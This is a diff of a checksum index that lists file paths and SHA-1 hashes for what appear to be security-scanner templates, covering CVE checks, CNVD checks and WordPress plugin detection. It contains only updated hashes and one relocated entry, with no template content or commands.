helpers/wordpress/plugins/simple-custom-post-order.txt:106ca8d85638866255a70e746e9653cec398864b helpers/wordpress/plugins/simple-history.txt:ee49c41e728b7af9b4fa9de669951863a79a98b1 @@ -919,7 +919,7 @@ helpers/wordpress/plugins/woo-variation-swatches.txt:08d2e98e6754af941484848930c helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155a36d36681935655d772bbc981bc2393fa3 helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:c8b9858b5f22b090d294062ac1a62f64a7de4d69 helpers/wordpress/plugins/woocommerce-legacy-rest-api.txt:6288dca36116a23967560d315aa079e9c4f5da8c -helpers/wordpress/plugins/woocommerce-payments.txt:373a109947826f162ef5dba14dc054105c72c5ca +helpers/wordpress/plugins/woocommerce-payments.txt:0ff9f22422909931ae84d9591d77f81147106c05 helpers/wordpress/plugins/woocommerce-paypal-payments.txt:036622d5a32b0e5099f20d8cff7515dc042253aa helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:a16cd18f1019f04b207109b189b504edbde41ab2 helpers/wordpress/plugins/woocommerce-services.txt:09d7c94b6b07df41fc11fe17f108ad704d3a058e @@ -945,7 +945,7 @@ helpers/wordpress/plugins/wp-seopress.txt:14665694dff2d37ef9323cf70015fe0466bea9 helpers/wordpress/plugins/wp-sitemap-page.txt:b600bf3dacb5d620338f6412a343d3349ec570bf helpers/wordpress/plugins/wp-smushit.txt:c7f53e91bcbfae4c21042e9d0833d24ed2cfc08c helpers/wordpress/plugins/wp-statistics.txt:eaf1c1bdfba4abe49a572dfe88b7618f7fedd9f4 -helpers/wordpress/plugins/wp-super-cache.txt:f84939ff21a1ffe63d6f3e405737228a6e174657 +helpers/wordpress/plugins/wp-super-cache.txt:9f028fa080dca632a19e807c2a3570f67ae71de3 helpers/wordpress/plugins/wp-user-avatar.txt:a7bfba4c08f393aabc53a4392dbd6b3d0f13baaa helpers/wordpress/plugins/wpcf7-recaptcha.txt:c3000a6db3b2781a189fbfaa91a73e6d63d567c9 helpers/wordpress/plugins/wpcf7-redirect.txt:e533a0ddf49ac25eb565f7786d75249e411bd53a @@ -984,6 +984,7 @@ http/cnvd/2021/CNVD-2021-33202.yaml:456cb1010d88aa9d66fe49b798317401e910bba4 http/cnvd/2021/CNVD-2021-41972.yaml:49971c05dd60e8d14f8d2c7eb92cdad18f62d3b4 http/cnvd/2021/CNVD-2021-43984.yaml:e6c70dfee97d7b8446455c82c402305c19a27a73 http/cnvd/2021/CNVD-2021-49104.yaml:f766f0c4ece9bdf09fb8ca471323937485dce9c3 +http/cnvd/2021/CNVD-2021-64035.yaml:e493efb6fa600cb2680bb596660d680642c1afbd http/cnvd/2022/CNVD-2022-03672.yaml:f4d4974170f405875cfc0cd6f61574e1a39b2772 http/cnvd/2022/CNVD-2022-42853.yaml:3a6672aeea87cae4f92e10b0c2502fb5f367967d http/cnvd/2022/CNVD-2022-43245.yaml:5517d85329dd0ed3f1e7ad377a975304030ce66b @@ -993,7 +994,6 @@ http/cnvd/2023/CNVD-2023-08743.yaml:8c2c0d1a7f369a2570b604f2aa5820f2de976388 http/cnvd/2023/CNVD-2023-12632.yaml:20d2c023ba88ea69568ea70c9619a6f229c9a929 http/cnvd/2023/CNVD-2023-96945.yaml:af381634d92b6ad37814da12d2f652c60614fe75 http/cnvd/2023/CNVD-C-2023-76801.yaml:7a741a8fbfcf92c4df98e64eada67899895d8078 -http/cnvd/2024/CNVD-2021-64035.yaml:101bc2035763e358d63266a80193de575b376202 http/cnvd/2024/CNVD-2024-15077.yaml:d97b1860e5154481146b5ebaf48f57448f62ecd1 http/credential-stuffing/README.md:88a738a7af33e930f046a6681114389b2f341fa2 http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml:8362d36f1fa45da68449901d392ba84be2f4a368 @@ -3273,7 +3273,7 @@ http/cves/2023/CVE-2023-4173.yaml:7a186ce21f79cc2aaf602f20096b3da265eea94e http/cves/2023/CVE-2023-4174.yaml:6d9b3231d2c766eb63eedeb04b924000b7999e4e http/cves/2023/CVE-2023-41763.yaml:b428682d889984946edc1203e1c240b9c5ae4137 http/cves/2023/CVE-2023-41892.yaml:1e501e0ef2d2102d6c865fe4547501649ec2164c -http/cves/2023/CVE-2023-4220.yaml:37f85450f2c470ce7c25e52facf939eb511460d2 +http/cves/2023/CVE-2023-4220.yaml:13a9dc65ed2ac07fbf9e1e8170cf1a1823fad370 http/cves/2023/CVE-2023-42343.yaml:69a0589c7e96b3ae72a73dc5610cd79f60246440 http/cves/2023/CVE-2023-42344.yaml:674f69182dcf67d59a4a19c9adfc0b2e92fe5645 http/cves/2023/CVE-2023-42442.yaml:5ea1d0998ecaa52c2608185126326ef0ea979314 @@ -7265,7 +7265,7 @@ http/technologies/vmware/vmware-detect.yaml:4f8fbfc3da99dc2f1d4b5294463c24adbd58 http/technologies/vmware/vmware-horizon-version.yaml:86445c8b1d7b19b717cf68e6135f1801214018af http/technologies/vmware/vmware-site-recovery-manager.yaml:206cc779975a1e77b16422af0454f4b370f18a73 http/technologies/vmware/vmware-vrealize-detect.yaml:b284b80bdd27cc66d9c343300bfc273448c724a6 -http/technologies/waf-detect.yaml:0cce0b5669bc9d6874ee987a9c4daed3f801c13a +http/technologies/waf-detect.yaml:1da278f80d64f754fafb85c371b6ed2734a603ee http/technologies/web-ftp-detect.yaml:ceaf8743ca94c6fbf3e7d380d0ed9be6f3796120 http/technologies/web-suite-detect.yaml:94ce185f9aee3a32ab9391218413ba5b4efd408f http/technologies/weblogic-detect.yaml:57acbd03a2cd58cd94f92843578359a5b479ac5d @@ -7273,228 +7273,228 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:1d3daa4fced7cba53de91f9333f36dffaf721359 -http/technologies/wordpress/plugins/add-to-any.yaml:7e4eb601c49f530b00d722ad97c274f4478a06ad -http/technologies/wordpress/plugins/admin-menu-editor.yaml:bee28db0ae68a8de5183fae2542a7d9bc8d765b5 +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:ba0e9871144fd0b0d420b5a2cbedb9eafb6149c0 -http/technologies/wordpress/plugins/akismet.yaml:80f5ba260bbea37b15fe50e21b5585276ed71451 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:3d00a7e81c3a89e1657ac4c1407088ab1f7c0420 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c72d2cc6ca972e24b260919836aa1ee318ab5aa6 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:cdbfba51fd54139e05f4d672c364100b370fb2c0 -http/technologies/wordpress/plugins/amp.yaml:fb1463b9327f4c761b767e52c989def666baf6f1 -http/technologies/wordpress/plugins/antispam-bee.yaml:6c337649c1dfaa5189fdc903962f59ab4fcc05c7 -http/technologies/wordpress/plugins/astra-sites.yaml:602677b732ff73126a23eba10af22c4fa9fed271 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:17d9540bcc6f421d2fc06e2beccc3c643c30688c -http/technologies/wordpress/plugins/backwpup.yaml:04718d6debd52c9cbf69d4b5d25f617342e97952 -http/technologies/wordpress/plugins/better-search-replace.yaml:4dd76b130af5f36edd18d8ed4010b07cf058f05b -http/technologies/wordpress/plugins/better-wp-security.yaml:4b473eefd957524ee2669d1288936267a66893a6 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:1898207c9714400cfc93ca177d99c8ad969bd440 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:a26b7304de08391e139d60d0e68eb64b5727cd4a -http/technologies/wordpress/plugins/breeze.yaml:700c0a041d4b6edd05120c3522fc8193906d0207 -http/technologies/wordpress/plugins/broken-link-checker.yaml:708cec18254cf9d214c46ebcf0a8becebbccba3a -http/technologies/wordpress/plugins/chaty.yaml:984e86614098d96082d78217b564d32dda624250 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5535e5e0c7421abbc66584c3f14a350169f108b7 -http/technologies/wordpress/plugins/classic-editor.yaml:d5427d073b0eca3fc369ea6ce069f338cf2384a4 -http/technologies/wordpress/plugins/classic-widgets.yaml:415736adb6fd77079c585086eea8887fd668bdd9 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:d87a03a0c7bc258e45ec21aa7584ac0278058515 +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba +http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:a554ce79ca315a2cd8963d93225c9f66e4d9fada -http/technologies/wordpress/plugins/coblocks.yaml:b34714784864a8f38795e08627de0c7231743452 -http/technologies/wordpress/plugins/code-snippets.yaml:0bc301b1b7a14ca79fc184e350b395c161074582 -http/technologies/wordpress/plugins/coming-soon.yaml:968a7b247662f4f5817e5506c597a6e323e1f126 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:caa91d75b64b6aad60044bb56a27304f32d5d01e -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:3c663a2794774b365474aabec4891dd2e46ca900 -http/technologies/wordpress/plugins/contact-form-7.yaml:2ad112eb1770d0a37b26f48348b7031f4c528c3b -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:5b4480ee1edb65cd1c22d57bbadb26f6ec5efd11 -http/technologies/wordpress/plugins/cookie-law-info.yaml:af3e63ff56240d912bfdc65144ee6c19c4335004 -http/technologies/wordpress/plugins/cookie-notice.yaml:431f3418241d7a25e492f3187e7ddada693e9676 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:25626c794b80a4407b29afc9c053ae4f747f8efd -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:155f3a6bb68459d0a47a08c3509ffab6356e39a0 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:d5f36274ece63a40f6c8e5df41d1c7c9a8e627b6 -http/technologies/wordpress/plugins/custom-css-js.yaml:1f4c9718ab27b50d62a5c79222c18474b53234ec -http/technologies/wordpress/plugins/custom-fonts.yaml:3a217060f1b59ceaa4ce039baece76dbbca03a97 -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:1481eded972c802c73e166efbc398b1e64cb51cd -http/technologies/wordpress/plugins/disable-comments.yaml:243676d865b0b7d4881a0bbd99ef711e82ea5713 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:f12b1011be280c9f35f1c214d60e2dc5efc2b1f6 -http/technologies/wordpress/plugins/duplicate-page.yaml:1b84011f66bb4baf9aaf32ecd85c77dced2203b1 -http/technologies/wordpress/plugins/duplicate-post.yaml:9aab0e90ef6c788d48d8106a3dc4715f53cb49c3 -http/technologies/wordpress/plugins/duplicator.yaml:bb9f0d66eaa77fa7f0326d94a8df218a73575aa9 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:4cc1012123a2da982cf6be18208d50c68479f1fa +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 +http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 +http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c +http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 +http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 +http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 +http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e +http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:1dee9b0499d6f09cd1496012cf5fc07a63cb29a4 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:48501b4ad5791d5be6f43de4154d2a7b5b297222 -http/technologies/wordpress/plugins/elementor.yaml:81bbe93a3d943f541b5b48cbaa1a6b17dd47a15a -http/technologies/wordpress/plugins/elementskit-lite.yaml:6eaec8609da369c527e2cffbd5c3ebae5a1b6056 -http/technologies/wordpress/plugins/enable-media-replace.yaml:88003404364d2fba3e3f8ac6204716f1938da2a5 -http/technologies/wordpress/plugins/envato-elements.yaml:fe5dcc0e62be41897fa477dff96d46c3d561a4cb -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:19d532028277725d9eb60577c11a6e70a8fe7b1c -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:2f9842f458ff94a6629fce816f8ef72fae33c078 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:2a86b22e62ca6dc6dbc9d9177a55af57af5435d7 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:b336be2cc157aa2ee2ddd7b9ae60af58dea4996d -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:dececf57068579eb7b2805a0da83833f76cd6e22 -http/technologies/wordpress/plugins/flamingo.yaml:8c80e0eda3ab11d07175e7948dd43128c72f04d3 -http/technologies/wordpress/plugins/fluentform.yaml:f65e7cea8dab63833119a4d124113de87df5051a -http/technologies/wordpress/plugins/font-awesome.yaml:bb603c578389af2ae91e10cca46be9949840d3c7 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:1334881683cdf2ed67206661390607974ec94ff7 -http/technologies/wordpress/plugins/formidable.yaml:f58b6e70ad8632939b9e16f880a50952f8bc26bb -http/technologies/wordpress/plugins/forminator.yaml:549e094041573007ee576bd38e6c910b19f6d2be -http/technologies/wordpress/plugins/ga-google-analytics.yaml:bcc972d3c60b494c706d6796e032b823df9667aa -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:d6ce008b5ee28d3081b6ab5d779278b9aac61c4c -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:1177d37aa27f348f67d08d8f90287a6c71dc7e26 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:28f3cadf83379046909c3048ad1053a70363e474 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:b5a08cbaf69b25598f4b75f5c7f17dad75f5294f -http/technologies/wordpress/plugins/google-site-kit.yaml:44e9c997e923b211e496a416f079e27cfc1c0031 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:4826d0e0d274bad8a846152c059ab43d5e7495e4 -http/technologies/wordpress/plugins/gtranslate.yaml:7aae8803e91182d75ca3ff760168186e8ee2a1ce -http/technologies/wordpress/plugins/gutenberg.yaml:6faf4f11cc90254da1fb2c68b84b747db1a84dd1 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:160dd2f3947f963e7ca194f20ed7b275bef94321 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 +http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 +http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 +http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d +http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc +http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 +http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 +http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 +http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e +http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 +http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa +http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 +http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 +http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5a633d727fe71e2dd3a1ff28db0797e8d4c045fc -http/technologies/wordpress/plugins/header-footer-elementor.yaml:a0a01c35436def3de3bc40c34e54ee826623798d -http/technologies/wordpress/plugins/header-footer.yaml:c5cf03baf5617e23fa376496e0b4822922462c10 -http/technologies/wordpress/plugins/health-check.yaml:2c4ab4580f61a587d22f6a0c8028ba0395e55d1c -http/technologies/wordpress/plugins/hello-dolly.yaml:267b036646e890a7ec8e2570051ca63d0fc2f659 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:086d78952d9864b0867ba700960204432f55dcee -http/technologies/wordpress/plugins/hostinger.yaml:2bbee2cc11eb933dd630c4fb9b9acfdbde8260bd -http/technologies/wordpress/plugins/image-optimization.yaml:4d511f137d4641856c8b7a47b09e86fe0c78a3fe -http/technologies/wordpress/plugins/imagify.yaml:3961271a05f9cac97e8b0e4ce394de3186e77d2e -http/technologies/wordpress/plugins/imsanity.yaml:6b7fa9f0f14022f1fe33cabcce1ceba5849b8bf9 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:1ecb07f17eaac49785a5f49396b5d66ca0f05451 -http/technologies/wordpress/plugins/instagram-feed.yaml:9edb115c9e29a3371fb69b938459c4584c406284 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:791c3f093ddf102f728a4043510f32f0bdd9d756 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d +http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf +http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 +http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 +http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 +http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 +http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff +http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 +http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:6a2480bd871368d24c53644402033582ce37955b -http/technologies/wordpress/plugins/jetpack.yaml:fe11582bd4607a6d1fb909a708e7569cee672d5a -http/technologies/wordpress/plugins/kadence-blocks.yaml:c8152772a15e56ed7011070cfd2f96d31b3e3bc8 -http/technologies/wordpress/plugins/kirki.yaml:b23551751c1ad2933f62bfffa479e4aacfb650be -http/technologies/wordpress/plugins/leadin.yaml:552f4f3d1eaa7a19e02620f0eaf736aa3d914ac9 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:1b9b2e2e8a6489c977cbd8fa6efbf91769ae2736 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:7644511689094e13b7c5ce42026c70703a2c697f -http/technologies/wordpress/plugins/litespeed-cache.yaml:d1ca4d337eb67fb74eced85c27df4683350f4f8f -http/technologies/wordpress/plugins/loco-translate.yaml:5f88526c1da3e941995dc91a6aecf04fd5f30e0b -http/technologies/wordpress/plugins/loginizer.yaml:edd2e0e824924e5ae86d21d8081e7764e3e77746 +http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f +http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 +http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a +http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc +http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c +http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 +http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 +http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:25da9a0a68fb2753a886aa8fd21db6b640752ca6 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:05b1dfb65e567c2c1f0cbeb3e774c4b456524dbd -http/technologies/wordpress/plugins/mailpoet.yaml:8f9546e807f7d2cabdeff46d265b431fe0029376 -http/technologies/wordpress/plugins/maintenance.yaml:a603d9d3ebd33fa855e224fb41bdfbd597b54954 -http/technologies/wordpress/plugins/mainwp-child.yaml:57912d0b1d2dd1adb60743308f8742665f0f56cf -http/technologies/wordpress/plugins/malcare-security.yaml:86d14d7b9ab89fb269794008f88a8d48af02d3e4 -http/technologies/wordpress/plugins/megamenu.yaml:3b2ee1de799560451d4915bbb5f94981b7e4ace0 -http/technologies/wordpress/plugins/members.yaml:0e17fdede2156c50095779ff904a7a698e784f0d -http/technologies/wordpress/plugins/meta-box.yaml:9d5912c0524630c581534307d234ca40aa0efc33 -http/technologies/wordpress/plugins/metform.yaml:517e69662e3b67e90ca24113f2804a985cb3a34b -http/technologies/wordpress/plugins/ml-slider.yaml:17e4d02a87e8032cf5853979fdf5d597d6798387 -http/technologies/wordpress/plugins/newsletter.yaml:973300fcaba8b4cede67dade58d1e65a732daa6b -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:1bd7dcc7f3f5eef95d50d5f4a61ce241ecd5796d -http/technologies/wordpress/plugins/nextgen-gallery.yaml:971e28a70dc44addb4e8cd0c3b399d1b39a50b98 -http/technologies/wordpress/plugins/ninja-forms.yaml:52112fa26fc7dd23c1820b83c2377a7c366ed855 -http/technologies/wordpress/plugins/ocean-extra.yaml:2e2e81dd68c5ea44175280e5f095c1b4591869a2 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:a2a03fcd4d09baccdcd7a122ecaad57c96d2b133 